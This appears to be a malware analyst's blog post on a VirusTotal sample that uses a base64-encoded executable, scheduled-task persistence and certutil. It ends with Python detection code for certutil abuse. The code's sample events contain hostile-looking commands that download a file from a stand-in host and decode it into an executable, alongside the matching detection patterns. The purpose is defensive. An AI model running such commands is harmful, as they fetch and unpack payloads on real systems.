Full Disclosure: I am on maternity leave. That means my brain is pretty much 95% baby focused (instead of object oriented programming I am now baby oriented programming). Apologies for the mis-said things in the video.
However, it's nice to dip into some 'fun' stuff to see what's happening on the more job-focused side of my life. I grabbed a random script from VT (VirusTotal) which triggered on a base64-encoded executable.
Persistence is maintained by creation of a scheduled task.
So I say 'name' for nttyuuyt when I should have said the process name nttyuuyt.
So... my thoughts on this:
Never heard of WinDivert before, so its use is new to me.
Again, the use of PowerShell and other built-in Windows functions is 'living off the land', making it a bit harder to detect.
At the time of writing this, only 14 of the 52 AV tools available in VirusTotal detected this. If you are still using just AV for detection, you are in some serious doo-doo.
The use of certutil is a classic method baddies use to download files and decode base64 on Windows. Sure, some devs may use this feature, but it's a simple thing to detect on. You can even look for user agents in proxy traffic to detect its use.
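As an added example (my own code, not from the sample or the video), here is the kind of detection logic the last point describes: flag certutil command lines that download or decode, and flag proxy requests carrying the CryptoAPI user agent that certutil's download path uses. The log lines are constructed, and the exact user-agent string and field layout are assumptions to confirm against your own telemetry.

```python
"""Detect certutil download/decode abuse from process and proxy telemetry.

Added example, not code from the original post. Sample events below are
constructed; the Microsoft-CryptoAPI user-agent string is an assumption
to verify in your own environment.
"""
import re

# certutil switches seen when it is used to fetch or decode payloads
DOWNLOAD_FLAGS = {"-urlcache", "-verifyctl"}
DECODE_FLAGS = {"-decode", "-decodehex"}

# Constructed telemetry: "<source>|<field>", where the field is a command
# line for process events and a user-agent header for proxy events.
SAMPLE_EVENTS = [
    "process|certutil.exe -urlcache -split -f http://example.invalid/p.txt p.txt",
    "process|certutil -decode p.txt nttyuuyt.exe",
    "process|certutil.exe -store My",          # legitimate admin use, no alert
    "proxy|Microsoft-CryptoAPI/10.0",
    "proxy|Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
]

def classify_process(cmdline):
    """Return a finding label for a certutil download or decode, else None."""
    parts = cmdline.lower().split()
    # Match certutil whether invoked bare or by full path, with or without .exe
    if not parts or not re.search(r"(^|[\\/])certutil(\.exe)?$", parts[0]):
        return None
    flags = {p for p in parts[1:] if p.startswith("-")}
    has_url = any(p.startswith(("http://", "https://")) for p in parts[1:])
    if flags & DOWNLOAD_FLAGS and has_url:
        return "certutil_download"
    if flags & DECODE_FLAGS:
        return "certutil_decode"
    return None

def classify_proxy(user_agent):
    """certutil fetches with the CryptoAPI user agent rather than a browser one."""
    if user_agent.startswith("Microsoft-CryptoAPI/"):
        return "cryptoapi_user_agent"
    return None

def scan(events):
    """Run both detections over mixed events; return (label, field) findings."""
    findings = []
    for line in events:
        source, _, field = line.partition("|")
        if source == "process":
            label = classify_process(field)
        elif source == "proxy":
            label = classify_proxy(field)
        else:
            continue
        if label:
            findings.append((label, field))
    return findings
```

The proxy check is the noisier of the two (Windows itself fetches CRLs and certificate chains with the same user agent), so correlate it with the process finding rather than alerting on it alone.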